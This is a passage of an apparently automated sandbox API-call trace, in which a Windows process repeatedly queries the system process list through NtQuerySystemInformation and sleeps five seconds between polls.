returned 0x0 [0283.626] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0283.627] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0283.627] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0283.628] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0283.628] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0283.631] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.632] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0283.634] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0283.634] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0283.634] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0283.635] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0283.635] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0283.639] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.640] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0283.641] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0283.641] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0283.642] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0283.642] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0283.642] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0283.647] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.648] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0283.649] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0283.649] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0283.650] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0283.650] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0283.650] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0283.654] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.655] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0283.656] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0283.656] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0283.657] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0283.657] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0283.658] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0283.662] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.662] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0283.663] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0283.664] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0283.664] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0283.664] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0283.665] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0283.668] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.669] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0283.670] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0283.671] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0283.671] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0283.671] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0283.672] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0283.675] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.676] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0283.678] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0283.678] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0283.679] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0283.679] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0283.679] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0283.683] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.683] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0283.685] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0283.685] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0283.686] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0283.686] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0283.686] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0283.690] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.691] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0283.692] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0283.693] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0283.693] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0283.694] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0283.694] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0283.697] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.699] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0283.701] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0283.701] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0283.702] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0283.702] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0283.702] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0283.705] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.706] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0283.708] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0283.708] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0283.708] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0283.709] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0283.709] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0283.714] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.715] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0283.717] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0283.717] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0283.718] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0283.718] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0283.718] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0283.722] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.723] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0283.724] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0283.724] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0283.725] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0283.725] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0283.726] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0283.729] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.730] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0283.732] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0283.732] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0283.733] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0283.733] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0283.733] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0283.737] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.738] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0283.739] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0283.739] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0283.740] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0283.740] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0283.741] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0283.744] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.745] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0283.746] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0283.746] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0283.747] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0283.747] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0283.747] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0283.751] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.752] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0283.753] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0283.753] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0283.754] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0283.754] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0283.754] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0283.758] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.758] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0283.760] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0283.760] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0283.762] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0283.762] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0283.762] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0283.766] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.766] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0283.768] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0283.768] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0283.769] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0283.769] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0283.769] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0283.774] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.776] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0283.778] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0283.778] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0283.779] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0283.779] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0283.779] NtQuerySystemInformation (in: 